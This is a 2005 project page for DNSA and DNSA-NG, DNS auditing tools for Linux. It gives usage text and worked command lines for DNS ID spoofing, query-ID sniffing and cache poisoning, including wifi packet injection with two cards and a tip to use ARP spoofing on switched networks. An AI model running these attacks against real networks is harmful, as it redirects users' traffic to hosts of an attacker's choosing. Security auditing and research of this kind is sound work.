DNSA (and DNSA-NG) - DNS Auditing tool

Pierre BETOUIN - pierre _dot_ betouin _at_ security-labs _dot_ org

Page last updated: Fri Jul 22 23:15 PDT 2005

DNSA and DNSA-NG are swiss knife tools for Linux designed to test several DNS security issues
You can download the current version of DNSA here. All bug reports and contributions are welcome. Don't hesitate to contact me. You can also download DNSA-NG 0.6 which can work with libnet-ng and support great new features. The most important one is a full wifi support using 2 cards :

The first in monitor mode which capture 802.11 traffic
The second associated to the AP and injecting DNS forged packets

Host-ap and madwifi drivers are already supported by DNSA-NG.

DNSA was initially thought because of a lack in DNS auditing tools. It uses libnet and libpcap :

"Libnet is a high-level API (toolkit) allowing the application programmer to construct and inject network packets. It provides a portable and simplified interface for low-level network packet shaping, handling and injection. Libnet hides much of the tedium of packet creation from the application programmer such as multiplexing, buffer management, arcane packet header information, byte-ordering, OS-dependent issues, and much more. Libnet features portable packet creation interfaces at the IP layer and link layer, as well as a host of supplementary and complementary functionality. Using libnet, quick and simple packet assembly applications can be whipped up with little effort. With a bit more time, more complex programs can be written (Traceroute and ping were easily rewritten using libnet and libpcap).

DNSA is distributed under the GPL licence.

Current Tree

Coming soon in stable 0.6 :

Man pages
DNS Server identification based on chaos version
DNS "collect servers" function

Current stable version : 0.5

Unstable DNSA-NG 0.6 :

New WiFi support (Prism and other chipsets)
Fixed some bugs

DNSA-NG 0.6
You'll have to compile it with Libnet-NG

DNSA Usage

Usage: ./dnsa [ARGS]
DNS Swiss knife tool

-1	DNS ID spoofing [ Required : -S ]
	-D [www.domain.org]	Hostname query to fool. Don't use it if every DNS request sniffed has to be spoofed
	-S [IP]	IP address to send for dns queries
	-s [IP]	IP address of the host to fool
	-i [interface]	IP address to send for dns queries
-2	DNS IDs Sniffing [ Required : -s ]
	-s [IP]	IP address of the server which makes queries
	-w [file]	Output file for DNS IDs
-3	DNS cache poisoning [ Required : -S AND -b AND -a ]
	-a [host.domain.org]	Hostname to send in the additional record
	-b [IP]	IP to send in the additional record
	-D [www.domain.org]	Hostname for query. Use it if you want to fool just on
	-S [IP]	IP address to send for DNS queries (the normal one)
	-s [IP]	IP address of the server to fool
	-i [interface]	IP address to send for DNS queries
-h	Print usage

DNSA-NG Usage

Usage: ./dnsa-ng [ARGS]
DNS Swiss knife tool

REQUIRED	-m [mode]	where mode can be raw4 or link (depending of your network topology)
REQUIRED	-t [media]	where media can be 'wifi' or 'ether' ('wifi' : needs 2 cards as describe in the documentation, needs the -I option to specify the injection card)
-1	DNS ID spoofing [ Required : -S ]
	-D [www.domain.org]	Hostname query to fool. Don't use it if every DNS request sniffed has to be spoofed
	-S [IP]	IP address to send for dns queries
	-s [IP]	IP address of the host to fool
	-i [interface]	IP address to send for dns queries
-2	DNS IDs Sniffing [ Required : -s ] (DEPRECATED IN THIS DNSA VERSION!)
	-s [IP]	IP address of the server which makes queries
	-w [file]	Output file for DNS IDs
-3	DNS cache poisoning [ Required : -S AND -b AND -a ] (DEPRECATED IN THIS DNSA VERSION!)
	-a [host.domain.org]	Hostname to send in the additional record
	-b [IP]	IP to send in the additional record
	-D [www.domain.org]	Hostname for query. Use it if you want to fool just on
	-S [IP]	IP address to send for DNS queries (the normal one)
	-s [IP]	IP address of the server to fool
	-i [interface]	IP address to send for DNS queries
-h	Print usage

DNSA Examples

DNS ID Spoofing

[ If you want to use it on switched networks, you'll need to use ARP spoofing. I recommand you arp-sk which is the greater to my sense ! ;) ]

./dnsa -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i INTERFACE
./dnsa -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i eth0

DNS Sniffing

[ For debug and tests purpose ]

./dnsa -2 -s HOST_TO_SNIFF -w file_to_store_IDs
./dnsa -2 -s 192.168.0.1 -w IDs_of_192.168.0.1

DNS cache poisoning

./dnsa -3 -D the_host_IP_which_is_asked_for -S normal_host_IP -s DNS_server_which_is_doing_the_request -a host_in_additional_record -b ip_in_the_additional_record -i INTERFACE
./dnsa -3 -D hacker.pirate.org -S 100.101.102.103 -s 194.117.200.10 -a www.microsoft.com -b 1.2.3.4 -i eth0

DNSA-NG Examples

DNS ID Spoofing

./dnsa-ng -m raw4 -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i CAPTURE_INTERFACE -t ether

./dnsa-ng -m raw4 -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i CAPTURE_INTERFACE -t wifi -I INJECTION_INTERFACE
iwconfig ath0 mode monitor channel 11
iwconfig wlan0 mode managed channel 11 essid HOTSPOT
dhclient wlan0
./dnsa -m raw4 -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i ath0 -t wifi -I wlan0

Related links

Article on "DNS intrinsic security flows" - Pierre BETOUIN ( pierre _dot_ betouin _at_ security-labs _dot_ org )

Back to Homepage